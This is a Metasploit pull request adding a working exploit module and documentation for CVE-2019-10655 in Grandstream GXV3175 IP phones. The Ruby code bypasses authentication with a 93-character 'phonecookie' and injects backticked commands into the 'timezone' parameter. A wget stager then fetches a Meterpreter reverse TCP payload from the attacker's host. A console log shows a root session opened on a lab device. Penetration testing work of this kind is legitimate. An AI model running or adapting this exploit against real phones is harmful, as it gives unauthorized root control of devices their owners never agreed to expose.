### PR TITLE
Add Grandstream GXV3175 'settimezone' Unauthenticated Command Execution

### DIFF
--- a/documentation/modules/exploit/linux/http/grandstream_gxv3175_settimezone_unauth_cmd_exec.md
+++ b/documentation/modules/exploit/linux/http/grandstream_gxv3175_settimezone_unauth_cmd_exec.md
@@ -1,0 +1,53 @@
+## Vulnerable Application
+
+This module exploits a command injection vulnerability in Grandstream GXV3175
+IP multimedia phones. The 'settimezone' action does not validate input in the
+'timezone' parameter allowing injection of arbitrary commands.
+
+A buffer overflow in the 'phonecookie' cookie parsing allows authentication
+to be bypassed by providing an alphanumeric cookie 93 characters in length.
+
+This module was tested successfully on Grandstream GXV3175v2
+hardware revision V2.6A with firmware version 1.0.1.19.
+
+## Verification Steps
+
+1. `msfconsole`
+1. `use exploit/linux/http/grandstream_gxv3175_settimezone_unauth_cmd_exec`
+1. `set rhosts [IP]`
+1. `set lhost [IP]`
+1. `run`
+1. You should get a session
+
+## Options
+
+
+## Scenarios
+
+```
+msf6 > use exploit/linux/http/grandstream_gxv3175_settimezone_unauth_cmd_exec 
+[*] Using configured payload linux/armle/meterpreter_reverse_tcp
+msf6 exploit(linux/http/grandstream_gxv3175_settimezone_unauth_cmd_exec) > set rhosts 10.1.1.109
+rhosts => 10.1.1.109
+msf6 exploit(linux/http/grandstream_gxv3175_settimezone_unauth_cmd_exec) > set lhost 10.1.1.110 
+lhost => 10.1.1.110
+msf6 exploit(linux/http/grandstream_gxv3175_settimezone_unauth_cmd_exec) > run
+
+[*] Started reverse TCP handler on 10.1.1.110:4444 
+[*] Using URL: http://0.0.0.0:8080/JF62dexHKN8b
+[*] Local IP: http://10.1.1.110:8080/JF62dexHKN8b
+[*] Client 10.1.1.109 (Wget/1.10.1) requested /JF62dexHKN8b
+[*] Sending payload to 10.1.1.109 (Wget/1.10.1)
+[*] Command Stager progress - 100.00% done (115/115 bytes)
+[*] Meterpreter session 1 opened (10.1.1.110:4444 -> 10.1.1.109:39371 ) at 2022-01-08 13:27:44 -0500
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo 
+Computer     : 10.1.1.109
+OS           :  (Linux 2.6.32_gxv3170v2)
+Architecture : armv7l
+BuildTuple   : armv5l-linux-musleabi
+Meterpreter  : armle/linux
+meterpreter >
+```

--- a/modules/exploits/linux/http/grandstream_gxv3175_settimezone_unauth_cmd_exec.rb
+++ b/modules/exploits/linux/http/grandstream_gxv3175_settimezone_unauth_cmd_exec.rb
@@ -1,0 +1,108 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  HttpFingerprint = { pattern: [ /Multimedia Phone/ ] }.freeze
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => "Grandstream GXV3175 'settimezone' Unauthenticated Command Execution",
+        'Description' => %q{
+          This module exploits a command injection vulnerability in Grandstream GXV3175
+          IP multimedia phones. The 'settimezone' action does not validate input in the
+          'timezone' parameter allowing injection of arbitrary commands.
+
+          A buffer overflow in the 'phonecookie' cookie parsing allows authentication
+          to be bypassed by providing an alphanumeric cookie 93 characters in length.
+
+          This module was tested successfully on Grandstream GXV3175v2
+          hardware revision V2.6A with firmware version 1.0.1.19.
+        },
+        'Author' => [
+          'alhazred', # Command injection vulnerability discovery and exploit
+          'Brendan Scarvell', # Auth bypass discovery
+          'bcoles' # Metasploit
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => 'linux',
+        'References' => [
+          [ 'CVE', '2019-10655' ],
+          [ 'URL', 'https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920' ],
+          [ 'URL', 'https://github.com/dirtyfilthy/gxv3175-remote-code-exec/blob/master/modules/exploits/linux/http/grandstream_gxv3175_cmd_exec.rb' ]
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        },
+        'DisclosureDate' => '2016-09-01',
+        'Privileged' => true,
+        'Arch' => ARCH_ARMLE,
+        'DefaultOptions' => {
+          'PrependFork' => true,
+          'MeterpreterTryToFork' => true,
+          'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',
+          'CMDSTAGER::FLAVOR' => 'wget'
+        },
+        'CmdStagerFlavor' => %w[wget],
+        'Targets' => [
+          ['Automatic', {}]
+        ],
+        'DefaultTarget' => 0
+      )
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri' => '/manager',
+      'cookie' => "phonecookie=\"#{rand_text_alpha(93)}\"",
+      'vars_get' => {
+        'action' => 'settimezone',
+        'timezone' => ''
+      }
+    )
+
+    if res && res.code == 200 && res.body.to_s.include?('Response=Success')
+      return CheckCode::Detected('phonecookie authentication bypassed successfully.')
+    end
+
+    CheckCode::Safe
+  end
+
+  def execute_command(cmd, _opts)
+    res = send_request_cgi(
+      'uri' => '/manager',
+      'cookie' => "phonecookie=\"#{rand_text_alpha(93)}\"",
+      'vars_get' => {
+        'action' => 'settimezone',
+        'timezone' => "`#{cmd}`"
+      }
+    )
+    unless res
+      fail_with(Failure::Unreachable, 'Connection failed')
+    end
+    unless res.code == 200
+      fail_with(Failure::UnexpectedReply, "Unexpected reply (HTTP #{res.code})")
+    end
+    unless res.body.to_s.include?('Response=Success')
+      fail_with(Failure::UnexpectedReply, "Unexpected reply (#{res.body.length} bytes)")
+    end
+  end
+
+  def exploit
+    execute_cmdstager(
+      linemax: 220, # 255 minus URL encoding
+      background: true
+    )
+  end
+end


### PR DESCRIPTION
This module exploits a command injection vulnerability in Grandstream GXV3175
IP multimedia phones. The 'settimezone' action does not validate input in the
'timezone' parameter allowing injection of arbitrary commands.

A buffer overflow in the 'phonecookie' cookie parsing allows authentication
to be bypassed by providing an alphanumeric cookie 93 characters in length.

This module was tested successfully on Grandstream GXV3175v2
hardware revision V2.6A with firmware version 1.0.1.19.

## Verification

1. `msfconsole`
1. `use exploit/linux/http/grandstream_gxv3175_settimezone_unauth_cmd_exec`
1. `set rhosts [IP]`
1. `set lhost [IP]`
1. `run`
1. You should get a session

